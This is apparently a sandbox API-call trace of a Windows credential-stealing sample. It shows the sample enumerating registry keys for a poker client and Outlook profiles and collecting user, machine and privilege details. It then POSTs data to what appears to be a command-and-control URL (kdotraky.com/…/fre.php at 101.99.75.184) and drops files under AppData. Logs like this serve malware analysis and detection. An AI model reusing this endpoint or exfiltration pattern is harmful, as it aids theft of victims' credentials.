__aulldvrm () [0135.624] __aulldvrm () [0135.625] __aulldvrm () [0135.626] __aulldvrm () [0135.627] __aulldvrm () [0135.628] __aulldvrm () [0135.629] __aulldvrm () [0135.630] __aulldvrm () [0135.631] __aulldvrm () [0135.632] __aulldvrm () [0135.633] __aulldvrm () [0135.634] __aulldvrm () [0135.635] __aulldvrm () [0135.636] __aulldvrm () [0135.637] __aulldvrm () [0135.638] __aulldvrm () [0135.639] __aulldvrm () [0135.640] __aulldvrm () [0135.641] __aulldvrm () [0135.642] __aulldvrm () [0135.643] __aulldvrm () [0135.644] __aulldvrm () [0135.646] __aulldvrm () [0135.647] __aulldvrm () [0135.648] __aulldvrm () [0135.649] __aulldvrm () [0135.650] __aulldvrm () [0135.651] __aulldvrm () [0135.652] __aulldvrm () [0135.653] __aulldvrm () [0135.655] __aulldvrm () [0135.656] __aulldvrm () [0135.657] __aulldvrm () [0135.658] __aulldvrm () [0135.660] __aulldvrm () [0135.661] __aulldvrm () [0135.662] __aulldvrm () [0135.663] __aulldvrm () [0135.664] __aulldvrm () [0135.700] SHEnumKeyExW (in: hkey=0x120, dwIndex=0x0, pszName=0x581fd8, pcchName=0x18fb98 | out: pszName="Adobe", pcchName=0x18fb98) returned 0x0 [0135.702] StrStrW (lpFirst="Adobe", lpSrch="Full Tilt Poker") returned 0x0 [0135.703] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0135.703] RegCloseKey (hKey=0x124) returned 0x0 [0135.703] SHEnumKeyExW (in: hkey=0x120, dwIndex=0x1, pszName=0x581fd8, pcchName=0x18fb98 | out: pszName="AppDataLow", pcchName=0x18fb98) returned 0x0 [0135.704] StrStrW (lpFirst="AppDataLow", lpSrch="Full Tilt Poker") returned 0x0 [0135.705] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0135.705] RegCloseKey (hKey=0x124) returned 0x0 [0135.705] SHEnumKeyExW (in: hkey=0x120, dwIndex=0x2, pszName=0x581fd8, pcchName=0x18fb98 | out: pszName="Clients", pcchName=0x18fb98) returned 0x0 [0135.707] StrStrW (lpFirst="Clients", lpSrch="Full Tilt Poker") returned 0x0 [0135.707] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0135.707] RegCloseKey (hKey=0x124) returned 0x0 [0135.708] SHEnumKeyExW (in: hkey=0x120, dwIndex=0x3, pszName=0x581fd8, pcchName=0x18fb98 | out: pszName="Google", pcchName=0x18fb98) returned 0x0 [0135.709] StrStrW (lpFirst="Google", lpSrch="Full Tilt Poker") returned 0x0 [0135.709] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0135.709] RegCloseKey (hKey=0x124) returned 0x0 [0135.710] SHEnumKeyExW (in: hkey=0x120, dwIndex=0x4, pszName=0x581fd8, pcchName=0x18fb98 | out: pszName="JavaSoft", pcchName=0x18fb98) returned 0x0 [0135.711] StrStrW (lpFirst="JavaSoft", lpSrch="Full Tilt Poker") returned 0x0 [0135.711] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0135.711] RegCloseKey (hKey=0x124) returned 0x0 [0135.712] SHEnumKeyExW (in: hkey=0x120, dwIndex=0x5, pszName=0x581fd8, pcchName=0x18fb98 | out: pszName="Macromedia", pcchName=0x18fb98) returned 0x0 [0135.713] StrStrW (lpFirst="Macromedia", lpSrch="Full Tilt Poker") returned 0x0 [0135.713] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0135.714] RegCloseKey (hKey=0x124) returned 0x0 [0135.714] SHEnumKeyExW (in: hkey=0x120, dwIndex=0x6, pszName=0x581fd8, pcchName=0x18fb98 | out: pszName="Microsoft", pcchName=0x18fb98) returned 0x0 [0135.715] StrStrW (lpFirst="Microsoft", lpSrch="Full Tilt Poker") returned 0x0 [0135.715] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0135.716] RegCloseKey (hKey=0x124) returned 0x0 [0135.716] SHEnumKeyExW (in: hkey=0x120, dwIndex=0x7, pszName=0x581fd8, pcchName=0x18fb98 | out: pszName="Mozilla", pcchName=0x18fb98) returned 0x0 [0135.717] StrStrW (lpFirst="Mozilla", lpSrch="Full Tilt Poker") returned 0x0 [0135.718] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0135.718] RegCloseKey (hKey=0x124) returned 0x0 [0135.718] SHEnumKeyExW (in: hkey=0x120, dwIndex=0x8, pszName=0x581fd8, pcchName=0x18fb98 | out: pszName="Netscape", pcchName=0x18fb98) returned 0x0 [0135.719] StrStrW (lpFirst="Netscape", lpSrch="Full Tilt Poker") returned 0x0 [0135.720] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0135.720] RegCloseKey (hKey=0x124) returned 0x0 [0135.721] SHEnumKeyExW (in: hkey=0x120, dwIndex=0x9, pszName=0x581fd8, pcchName=0x18fb98 | out: pszName="ODBC", pcchName=0x18fb98) returned 0x0 [0135.722] StrStrW (lpFirst="ODBC", lpSrch="Full Tilt Poker") returned 0x0 [0135.722] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0135.722] RegCloseKey (hKey=0x124) returned 0x0 [0135.723] SHEnumKeyExW (in: hkey=0x120, dwIndex=0xa, pszName=0x581fd8, pcchName=0x18fb98 | out: pszName="Policies", pcchName=0x18fb98) returned 0x0 [0135.724] StrStrW (lpFirst="Policies", lpSrch="Full Tilt Poker") returned 0x0 [0135.724] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0135.724] RegCloseKey (hKey=0x124) returned 0x0 [0135.725] SHEnumKeyExW (in: hkey=0x120, dwIndex=0xb, pszName=0x581fd8, pcchName=0x18fb98 | out: pszName="Wow6432Node", pcchName=0x18fb98) returned 0x0 [0135.726] StrStrW (lpFirst="Wow6432Node", lpSrch="Full Tilt Poker") returned 0x0 [0135.726] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0135.726] RegCloseKey (hKey=0x124) returned 0x0 [0135.727] SHEnumKeyExW (in: hkey=0x120, dwIndex=0xc, pszName=0x581fd8, pcchName=0x18fb98 | out: pszName="Classes", pcchName=0x18fb98) returned 0x0 [0135.728] StrStrW (lpFirst="Classes", lpSrch="Full Tilt Poker") returned 0x0 [0135.728] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0135.729] RegCloseKey (hKey=0x124) returned 0x0 [0135.729] SHEnumKeyExW (in: hkey=0x120, dwIndex=0xd, pszName=0x581fd8, pcchName=0x18fb98 | out: pszName="", pcchName=0x18fb98) returned 0x103 [0135.730] RegCloseKey (hKey=0x120) returned 0x0 [0135.797] Sleep (dwMilliseconds=0xa) [0135.875] SHEnumKeyExW (in: hkey=0x128, dwIndex=0x0, pszName=0x58b5d8, pcchName=0x18fba4 | out: pszName="0a0d020000000000c000000000000046", pcchName=0x18fba4) returned 0x0 [0135.877] SHEnumKeyExW (in: hkey=0x12c, dwIndex=0x0, pszName=0x58baf0, pcchName=0x18fb74 | out: pszName="", pcchName=0x18fb74) returned 0x103 [0135.878] RegCloseKey (hKey=0x12c) returned 0x0 [0135.878] RegCloseKey (hKey=0x120) returned 0x0 [0135.879] SHEnumKeyExW (in: hkey=0x128, dwIndex=0x1, pszName=0x58b5d8, pcchName=0x18fba4 | out: pszName="13dbb0c8aa05101a9bb000aa002fc45a", pcchName=0x18fba4) returned 0x0 [0135.882] SHEnumKeyExW (in: hkey=0x12c, dwIndex=0x0, pszName=0x58baf0, pcchName=0x18fb74 | out: pszName="", pcchName=0x18fb74) returned 0x103 [0135.882] RegCloseKey (hKey=0x12c) returned 0x0 [0135.883] RegCloseKey (hKey=0x120) returned 0x0 [0135.883] SHEnumKeyExW (in: hkey=0x128, dwIndex=0x2, pszName=0x58b5d8, pcchName=0x18fba4 | out: pszName="29091b5932ee0f48aec4673270b08577", pcchName=0x18fba4) returned 0x0 [0135.886] SHEnumKeyExW (in: hkey=0x12c, dwIndex=0x0, pszName=0x58baf0, pcchName=0x18fb74 | out: pszName="", pcchName=0x18fb74) returned 0x103 [0135.886] RegCloseKey (hKey=0x12c) returned 0x0 [0135.887] RegCloseKey (hKey=0x120) returned 0x0 [0135.887] SHEnumKeyExW (in: hkey=0x128, dwIndex=0x3, pszName=0x58b5d8, pcchName=0x18fba4 | out: pszName="349c13b2d278c3458833b7862c0157f4", pcchName=0x18fba4) returned 0x0 [0135.890] SHEnumKeyExW (in: hkey=0x12c, dwIndex=0x0, pszName=0x58baf0, pcchName=0x18fb74 | out: pszName="", pcchName=0x18fb74) returned 0x103 [0135.891] RegCloseKey (hKey=0x12c) returned 0x0 [0135.891] RegCloseKey (hKey=0x120) returned 0x0 [0135.892] SHEnumKeyExW (in: hkey=0x128, dwIndex=0x4, pszName=0x58b5d8, pcchName=0x18fba4 | out: pszName="3517490d76624c419a828607e2a54604", pcchName=0x18fba4) returned 0x0 [0135.895] SHEnumKeyExW (in: hkey=0x12c, dwIndex=0x0, pszName=0x58baf0, pcchName=0x18fb74 | out: pszName="", pcchName=0x18fb74) returned 0x103 [0135.895] RegCloseKey (hKey=0x12c) returned 0x0 [0135.896] RegCloseKey (hKey=0x120) returned 0x0 [0135.896] SHEnumKeyExW (in: hkey=0x128, dwIndex=0x5, pszName=0x58b5d8, pcchName=0x18fba4 | out: pszName="8503020000000000c000000000000046", pcchName=0x18fba4) returned 0x0 [0135.899] SHEnumKeyExW (in: hkey=0x12c, dwIndex=0x0, pszName=0x58baf0, pcchName=0x18fb74 | out: pszName="", pcchName=0x18fb74) returned 0x103 [0135.899] RegCloseKey (hKey=0x12c) returned 0x0 [0135.900] RegCloseKey (hKey=0x120) returned 0x0 [0135.900] SHEnumKeyExW (in: hkey=0x128, dwIndex=0x6, pszName=0x58b5d8, pcchName=0x18fba4 | out: pszName="882b4247eb9feb478bcaf90664ec624c", pcchName=0x18fba4) returned 0x0 [0135.903] SHEnumKeyExW (in: hkey=0x12c, dwIndex=0x0, pszName=0x58baf0, pcchName=0x18fb74 | out: pszName="", pcchName=0x18fb74) returned 0x103 [0135.904] RegCloseKey (hKey=0x12c) returned 0x0 [0135.905] RegCloseKey (hKey=0x120) returned 0x0 [0135.905] SHEnumKeyExW (in: hkey=0x128, dwIndex=0x7, pszName=0x58b5d8, pcchName=0x18fba4 | out: pszName="9207f3e0a3b11019908b08002b2a56c2", pcchName=0x18fba4) returned 0x0 [0135.909] SHEnumKeyExW (in: hkey=0x12c, dwIndex=0x0, pszName=0x58baf0, pcchName=0x18fb74 | out: pszName="", pcchName=0x18fb74) returned 0x103 [0135.909] RegCloseKey (hKey=0x12c) returned 0x0 [0135.910] RegCloseKey (hKey=0x120) returned 0x0 [0135.910] SHEnumKeyExW (in: hkey=0x128, dwIndex=0x8, pszName=0x58b5d8, pcchName=0x18fba4 | out: pszName="9375CFF0413111d3B88A00104B2A6676", pcchName=0x18fba4) returned 0x0 [0135.913] SHEnumKeyExW (in: hkey=0x12c, dwIndex=0x0, pszName=0x58baf0, pcchName=0x18fb74 | out: pszName="00000001", pcchName=0x18fb74) returned 0x0 [0135.916] SHEnumKeyExW (in: hkey=0x134, dwIndex=0x0, pszName=0x58c020, pcchName=0x18fb44 | out: pszName="", pcchName=0x18fb44) returned 0x103 [0135.916] RegCloseKey (hKey=0x134) returned 0x0 [0135.917] RegCloseKey (hKey=0x130) returned 0x0 [0135.917] SHEnumKeyExW (in: hkey=0x12c, dwIndex=0x1, pszName=0x58baf0, pcchName=0x18fb74 | out: pszName="00000002", pcchName=0x18fb74) returned 0x0 [0135.932] SHEnumKeyExW (in: hkey=0x134, dwIndex=0x0, pszName=0x58c020, pcchName=0x18fb44 | out: pszName="", pcchName=0x18fb44) returned 0x103 [0135.933] RegCloseKey (hKey=0x134) returned 0x0 [0135.933] RegCloseKey (hKey=0x130) returned 0x0 [0135.934] SHEnumKeyExW (in: hkey=0x12c, dwIndex=0x2, pszName=0x58baf0, pcchName=0x18fb74 | out: pszName="00000003", pcchName=0x18fb74) returned 0x0 [0135.938] SHEnumKeyExW (in: hkey=0x134, dwIndex=0x0, pszName=0x58c020, pcchName=0x18fb44 | out: pszName="", pcchName=0x18fb44) returned 0x103 [0135.938] RegCloseKey (hKey=0x134) returned 0x0 [0135.939] RegCloseKey (hKey=0x130) returned 0x0 [0135.939] SHEnumKeyExW (in: hkey=0x12c, dwIndex=0x3, pszName=0x58baf0, pcchName=0x18fb74 | out: pszName="", pcchName=0x18fb74) returned 0x103 [0135.940] RegCloseKey (hKey=0x12c) returned 0x0 [0135.941] RegCloseKey (hKey=0x120) returned 0x0 [0135.941] SHEnumKeyExW (in: hkey=0x128, dwIndex=0x9, pszName=0x58b5d8, pcchName=0x18fba4 | out: pszName="dfc6f427732b824da2ca53fc3cafb157", pcchName=0x18fba4) returned 0x0 [0135.944] SHEnumKeyExW (in: hkey=0x12c, dwIndex=0x0, pszName=0x58baf0, pcchName=0x18fb74 | out: pszName="", pcchName=0x18fb74) returned 0x103 [0135.944] RegCloseKey (hKey=0x12c) returned 0x0 [0135.945] RegCloseKey (hKey=0x120) returned 0x0 [0135.945] SHEnumKeyExW (in: hkey=0x128, dwIndex=0xa, pszName=0x58b5d8, pcchName=0x18fba4 | out: pszName="{D9734F19-8CFB-411D-BC59-833E334FCB5E}", pcchName=0x18fba4) returned 0x0 [0135.948] SHEnumKeyExW (in: hkey=0x12c, dwIndex=0x0, pszName=0x58d9f0, pcchName=0x18fb74 | out: pszName="Calendar Summary", pcchName=0x18fb74) returned 0x0 [0135.951] SHEnumKeyExW (in: hkey=0x134, dwIndex=0x0, pszName=0x58df38, pcchName=0x18fb44 | out: pszName="", pcchName=0x18fb44) returned 0x103 [0135.951] RegCloseKey (hKey=0x134) returned 0x0 [0135.952] RegCloseKey (hKey=0x130) returned 0x0 [0135.952] SHEnumKeyExW (in: hkey=0x12c, dwIndex=0x1, pszName=0x58d9f0, pcchName=0x18fb74 | out: pszName="Reminders", pcchName=0x18fb74) returned 0x0 [0135.955] SHEnumKeyExW (in: hkey=0x134, dwIndex=0x0, pszName=0x58df28, pcchName=0x18fb44 | out: pszName="", pcchName=0x18fb44) returned 0x103 [0135.956] RegCloseKey (hKey=0x134) returned 0x0 [0135.956] RegCloseKey (hKey=0x130) returned 0x0 [0135.957] SHEnumKeyExW (in: hkey=0x12c, dwIndex=0x2, pszName=0x58d9f0, pcchName=0x18fb74 | out: pszName="", pcchName=0x18fb74) returned 0x103 [0135.957] RegCloseKey (hKey=0x12c) returned 0x0 [0135.958] RegCloseKey (hKey=0x120) returned 0x0 [0135.958] SHEnumKeyExW (in: hkey=0x128, dwIndex=0xb, pszName=0x58b5d8, pcchName=0x18fba4 | out: pszName="", pcchName=0x18fba4) returned 0x103 [0135.959] RegCloseKey (hKey=0x128) returned 0x0 [0136.074] GetUserNameW (in: lpBuffer=0x58b5d8, pcbBuffer=0x18fb7c | out: lpBuffer="kFT6uTQW", pcbBuffer=0x18fb7c) returned 1 [0136.074] GetComputerNameW (in: lpBuffer=0x58b5d8, nSize=0x18fb7c | out: lpBuffer="XABNCPUWKW", nSize=0x18fb7c) returned 1 [0136.075] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x18fb7c | out: TokenHandle=0x18fb7c*=0x0) returned 0 [0136.075] GetLastError () returned 0x3f0 [0136.075] GetCurrentProcess () returned 0xffffffff [0136.076] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0136.076] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18fb7c | out: TokenHandle=0x18fb7c*=0x120) returned 1 [0136.077] GetTokenInformation (in: TokenHandle=0x120, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18fb78 | out: TokenInformation=0x0, ReturnLength=0x18fb78) returned 0 [0136.077] GetTokenInformation (in: TokenHandle=0x120, TokenInformationClass=0x1, TokenInformation=0x5857b0, TokenInformationLength=0x24, ReturnLength=0x18fb78 | out: TokenInformation=0x5857b0, ReturnLength=0x18fb78) returned 1 [0136.077] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0136.078] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x5857b8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x87)), Name=0x58b5d8, cchName=0x18fb68, ReferencedDomainName=0x586638, cchReferencedDomainName=0x18fb6c, peUse=0x18fb64 | out: Name="kFT6uTQW", cchName=0x18fb68, ReferencedDomainName="XABNCPUWKW", cchReferencedDomainName=0x18fb6c, peUse=0x18fb64) returned 1 [0136.079] GetDesktopWindow () returned 0x10010 [0136.080] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0136.080] GetWindowRect (in: hWnd=0x10010, lpRect=0x18fb70 | out: lpRect=0x18fb70) returned 1 [0136.081] GetUserNameW (in: lpBuffer=0x18f970, pcbBuffer=0x18fb78 | out: lpBuffer="kFT6uTQW", pcbBuffer=0x18fb78) returned 1 [0136.081] LoadLibraryW (lpLibFileName="NETAPI32") returned 0x75510000 [0136.196] GetProcAddress (hModule=0x75510000, lpProcName="NetUserGetInfo") returned 0x754c1be2 [0136.254] NetUserGetInfo (in: servername=0x0, username="kFT6uTQW", level=0x1, bufptr=0x18fb7c | out: bufptr=0x57e698*(usri1_name="kFT6uTQW", usri1_password=0x0, usri1_password_age=0x13fe51c, usri1_priv=0x2, usri1_home_dir="", usri1_comment="", usri1_flags=0x10201, usri1_script_path="")) returned 0x0 [0136.310] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0136.310] AllocateAndInitializeSid (in: pIdentifierAuthority=0x18fb68, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x18fb70 | out: pSid=0x18fb70*=0x5830a8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0136.310] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0136.311] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x5830a8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x18fb74 | out: IsMember=0x18fb74) returned 1 [0136.311] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0136.311] GetNativeSystemInfo (in: lpSystemInfo=0x18fb4c | out: lpSystemInfo=0x18fb4c*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0136.312] CryptAcquireContextW (in: phProv=0x18f928, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x18f928*=0x0) returned 1 [0136.457] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0136.457] CryptAcquireContextW (in: phProv=0x18f928, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x18f928*=0x58b958) returned 1 [0136.476] _imp_load__CryptImportKey () returned 0x1 [0136.477] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0136.478] CryptSetKeyParam (hKey=0x58a580, dwParam=0x4, pbData=0x18f924*=0x1, dwFlags=0x0) returned 1 [0136.478] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0136.478] CryptSetKeyParam (hKey=0x58a580, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0136.479] CryptDecrypt (in: hKey=0x58a580, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x57a600, pdwDataLen=0x18f97c | out: pbData=0x57a600, pdwDataLen=0x18f97c) returned 1 [0136.480] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0136.481] CryptDestroyKey (hKey=0x58a580) returned 1 [0136.481] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0136.481] CryptReleaseContext (hProv=0x58b958, dwFlags=0x0) returned 1 [0136.482] StrStrA (lpFirst="http://kdotraky.com/temp/Panel/five/fre.php", lpSrch="http://") returned="http://kdotraky.com/temp/Panel/five/fre.php" [0136.482] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0136.482] StrStrA (lpFirst="kdotraky.com/temp/Panel/five/fre.php", lpSrch="/") returned="/temp/Panel/five/fre.php" [0136.483] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0136.483] StrStrA (lpFirst="kdotraky.com/temp/Panel/five/fre.php", lpSrch=":") returned 0x0 [0136.483] getaddrinfo (in: pNodeName="kdotraky.com", pServiceName="80", pHints=0x18f938*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x18f958 | out: ppResult=0x18f958*=0x560e30*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5946f0*(sa_family=2, sin_port=0x50, sin_addr="101.99.75.184"), ai_next=0x0)) returned 0 [0136.497] socket (af=2, type=1, protocol=6) returned 0x18c [0136.499] connect (s=0x18c, name=0x5946f0*(sa_family=2, sin_port=0x50, sin_addr="101.99.75.184"), namelen=16) returned 0 [0136.696] FreeAddrInfoW (pAddrInfo=0x560e30*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5946f0*(sa_family=2, sin_port=0x50, sin_addr="101.99.75.184"), ai_next=0x0)) [0136.697] wvsprintfA (in: param_1=0x596310, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x18f960 | out: param_1="POST /temp/Panel/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: kdotraky.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 183 [0136.698] wvsprintfA (in: param_1=0x596310, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x18f960 | out: param_1="POST /temp/Panel/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: kdotraky.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 1B8D0678\r\nContent-Length: 266\r\nConnection: close\r\n\r\n") returned 248 [0136.698] send (in: s=0x18c, buf=0x5949d0*, len=248, flags=0 | out: buf=0x5949d0*) returned 248 [0136.698] send (in: s=0x18c, buf=0x58d9f0*, len=266, flags=0 | out: buf=0x58d9f0*) returned 266 [0136.698] recv (in: s=0x18c, buf=0x596310, len=4048, flags=0 | out: buf=0x596310*) returned 179 [0137.265] closesocket (s=0x18c) returned 0 [0137.268] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x18fb1c, dwLength=0x1c | out: lpBuffer=0x18fb1c*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0137.269] VirtualAlloc (lpAddress=0x0, dwSize=0x1004, flAllocationType=0x3000, flProtect=0x4) returned 0x250000 [0137.269] VirtualFree (lpAddress=0x230000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.270] DeleteFileW (lpFileName="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\98E541\\12EEF2.hdb" (normalized: "c:\\users\\kft6utqw\\appdata\\roaming\\98e541\\12eef2.hdb")) returned 0 [0137.270] CreateFileW (lpFileName="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\98E541\\12EEF2.hdb" (normalized: "c:\\users\\kft6utqw\\appdata\\roaming\\98e541\\12eef2.hdb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0137.271] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.271] WriteFile (in: hFile=0x18c, lpBuffer=0x250000*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x18fb44, lpOverlapped=0x0 | out: lpBuffer=0x250000*, lpNumberOfBytesWritten=0x18fb44*=0x4, lpOverlapped=0x0) returned 1 [0137.272] CloseHandle (hObject=0x18c) returned 1 [0137.294] AllocateAndInitializeSid (in: pIdentifierAuthority=0x18fba4, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x18fbac | out: pSid=0x18fbac*=0x5946f0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0137.294] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0137.294] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x5946f0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x18fbb0 | out: IsMember=0x18fbb0) returned 1 [0137.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0137.295] DeleteFileW (lpFileName="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\98E541\\12EEF2.lck" (normalized: "c:\\users\\kft6utqw\\appdata\\roaming\\98e541\\12eef2.lck")) returned 1 [0137.297] GetUserNameW (in: lpBuffer=0x58a108, pcbBuffer=0x18fb7c | out: lpBuffer="kFT6uTQW", pcbBuffer=0x18fb7c) returned 1 [0137.298] GetComputerNameW (in: lpBuffer=0x58a108, nSize=0x18fb7c | out: lpBuffer="XABNCPUWKW", nSize=0x18fb7c) returned 1 [0137.299] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x18fb7c | out: TokenHandle=0x18fb7c*=0x0) returned 0 [0137.299] GetLastError () returned 0x3f0 [0137.299] GetCurrentProcess () returned 0xffffffff [0137.299] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0137.299] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18fb7c | out: TokenHandle=0x18fb7c*=0x17c) returned 1 [0137.300] GetTokenInformation (in: TokenHandle=0x17c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18fb78 | out: TokenInformation=0x0, ReturnLength=0x18fb78) returned 0 [0137.300] GetTokenInformation (in: TokenHandle=0x17c, TokenInformationClass=0x1, TokenInformation=0x5857b0, TokenInformationLength=0x24, ReturnLength=0x18fb78 | out: TokenInformation=0x5857b0, ReturnLength=0x18fb78) returned 1 [0137.301] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0137.301] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x5857b8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x87)), Name=0x58a108, cchName=0x18fb68, ReferencedDomainName=0x5949d0, cchReferencedDomainName=0x18fb6c, peUse=0x18fb64 | out: Name="kFT6uTQW", cchName=0x18fb68, ReferencedDomainName="XABNCPUWKW", cchReferencedDomainName=0x18fb6c, peUse=0x18fb64) returned 1 [0137.307] GetDesktopWindow () returned 0x10010 [0137.308] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0137.308] GetWindowRect (in: hWnd=0x10010, lpRect=0x18fb70 | out: lpRect=0x18fb70) returned 1 [0137.308] GetUserNameW (in: lpBuffer=0x18f970, pcbBuffer=0x18fb78 | out: lpBuffer="kFT6uTQW", pcbBuffer=0x18fb78) returned 1 [0137.309] LoadLibraryW (lpLibFileName="NETAPI32") returned 0x75510000 [0137.310] GetProcAddress (hModule=0x75510000, lpProcName="NetUserGetInfo") returned 0x754c1be2 [0137.310] NetUserGetInfo (in: servername=0x0, username="kFT6uTQW", level=0x1, bufptr=0x18fb7c | out: bufptr=0x595960*(usri1_name="kFT6uTQW", usri1_password=0x0, usri1_password_age=0x13fe51d, usri1_priv=0x2, usri1_home_dir="", usri1_comment="", usri1_flags=0x10201, usri1_script_path="")) returned 0x0 [0137.312] 